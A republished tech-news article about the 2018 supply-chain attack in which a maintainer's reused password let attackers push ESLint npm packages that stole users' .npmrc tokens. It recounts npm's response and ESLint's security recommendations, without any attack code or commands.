• Home
  • >
  • Software Development
  • >
  • Poor Password Hygiene Enabled ESLint Supply-Chain Attack on Npm – InApps Technology 2022

Poor Password Hygiene Enabled ESLint Supply-Chain Attack on Npm – InApps Technology is an article under the topic Software Development Many of you are most interested in today !! Today, let’s InApps.net learn Poor Password Hygiene Enabled ESLint Supply-Chain Attack on Npm – InApps Technology in today’s post !

Read more about Poor Password Hygiene Enabled ESLint Supply-Chain Attack on Npm – InApps Technology at Wikipedia

You can find content about Poor Password Hygiene Enabled ESLint Supply-Chain Attack on Npm – InApps Technology from the Wikipedia website

The npm registry maintainers invalidated developer login tokens last week after attackers compromised two legitimate packages associated with the ESLint library and rigged them with malicious code.

“On July 12th, 2018, an attacker compromised the npm account of an ESLint maintainer and published malicious versions of the eslint-scope and eslint-config-eslint packages to the npm registry,” the ESLint team said in an incident report.

The rogue versions included a malicious postinstall script that downloaded and executed rogue code from pastebin.com designed to steal users’ .npmrc files. These are local configuration files that typically contain access tokens for publishing packages to the npm registry.

In conclusion, this was a fully fledged software supply-chain attack whose goal was to compromise additional developers and potentially poison their own packages to further additional attacks.

ESLint is a popular open-source JavaScript utility for linting, a static code analysis process used to identify programming bugs, stylistic errors and potentially problematic code constructs. The utility is hosted by the JS Foundation, uses the Node.js runtime environment and is installed via npm.

According to the ESLint incident report, the attackers found a maintainer’s npm email and password in a third-party breach, which indicates poor password hygiene.

Reusing passwords across multiple services is a dangerous practice and a common cause for account hijackings. Attackers automatically test leaked credentials against multiple websites using so-called credential stuffing techniques.

Read More:   Discussing Microservices and APIs with Stoplight.io’s Taylor Barnett – InApps 2022

Unfortunately, despite the widespread availability of easy-to-use password management tools, credential reuse continues to remain a common practice among users, including developers. A recent incident where malicious code was published on the Gentoo Linux repository on GitHub was also the result of an administrator having his or her password compromised in a third-party breach.

In the case of ESLint, attackers used the npm authentication token they obtained to publish a new version (5.0.2) of the eslint-config-eslint package, which contained the malicious postinstall script. They then unpublished eslint-config-eslint 5.0.2 and published eslint-scope 3.7.2 containing the same script.

Fortunately, the malicious code was spotted by an ESLint user within 40 minutes and the project’s maintainers were alerted. The eslint-scope 3.7.2 package was taken down one and a half hours later and a clean eslint-scope version (3.7.3) was published in its place so that caches would be updated.

The npm team also decided to invalidate all login tokens created before 2018-07-12 12:30 UTC in order to mitigate any potential effects the attack might have had on other developers. This action caused some load issues on npmjs.com that was quickly resolved.

“Your npm login token does not give an attacker your npm password,” the npm registry maintainers said. “You can revoke all existing tokens by visiting https://www.npmjs.com/settings/~/tokens” (log-in required).

Following the incident the ESLint team published the following recommendations for all developers who publish on npm:

  • Package maintainers and users should avoid reusing the same password across multiple different sites. A password manager like 1Password or LastPass can help with this.
  • Package maintainers should enable npm two-factor authentication. npm has a guide here. If you use Lerna, you can follow this issue.
  • Package maintainers should audit and limit the number of people who have access to publish on npm.
  • Package maintainers should be careful with using any services that auto-merge dependency upgrades.
  • Application developers should use a lock file (package-lock.json or yarn.lock) to prevent the auto-install of new packages.
Read More:   Apache’s Jim Jagielski on the Changing Philosophies of Open Source Licensing – InApps Technology 2022

For more detailed information on password management and online account security, you can read our own TNS guide.

Feature image via Pixabay.

Source: InApps.net

Rate this post
As a Senior Tech Enthusiast, I bring a decade of experience to the realm of tech writing, blending deep industry knowledge with a passion for storytelling. With expertise in software development to emerging tech trends like AI and IoT—my articles not only inform but also inspire. My journey in tech writing has been marked by a commitment to accuracy, clarity, and engaging storytelling, making me a trusted voice in the tech community.

Let’s create the next big thing together!

Coming together is a beginning. Keeping together is progress. Working together is success.

Let’s talk

Get a custom Proposal

Please fill in your information and your need to get a suitable solution.

    You need to enter your email to download


      Success. Downloading...